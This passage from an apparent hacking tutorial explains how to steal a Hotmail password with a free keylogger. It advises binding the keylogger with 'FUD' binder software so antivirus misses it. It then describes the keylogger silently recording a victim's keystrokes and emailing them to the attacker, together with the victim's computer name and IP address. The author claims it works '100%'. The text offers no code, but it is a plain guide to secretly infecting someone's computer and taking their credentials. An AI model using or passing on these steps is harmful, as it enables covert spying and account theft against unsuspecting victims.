Note: Use Binder software which is itself a FUD. If you use non-FUD Binder software, then keylogger will get detected as virus after binding. Be careful while choosing Binder


6. When server keylogger file is installed on victim computer, this keylogger will start recording the typed keystrokes on victim computer. These keystrokes will contain windows live password which we wannahack. Keylogger will then send these recorded keystroke logs to your email address which you have entered in Step 4. 7. Thus, you will receive emails like this:




8. What is unique in this keylogger is that this keylogger
also sends you computer name and IP addressof victim alongwith typed keystrokes. Many times, IP address is required for hacking remote computers. In such cases, Easy keylogger is very useful.


Thus, you can hack a hotmail password using this free keylogger. I have personally tested this free keylogger and found it working 100%

Read More...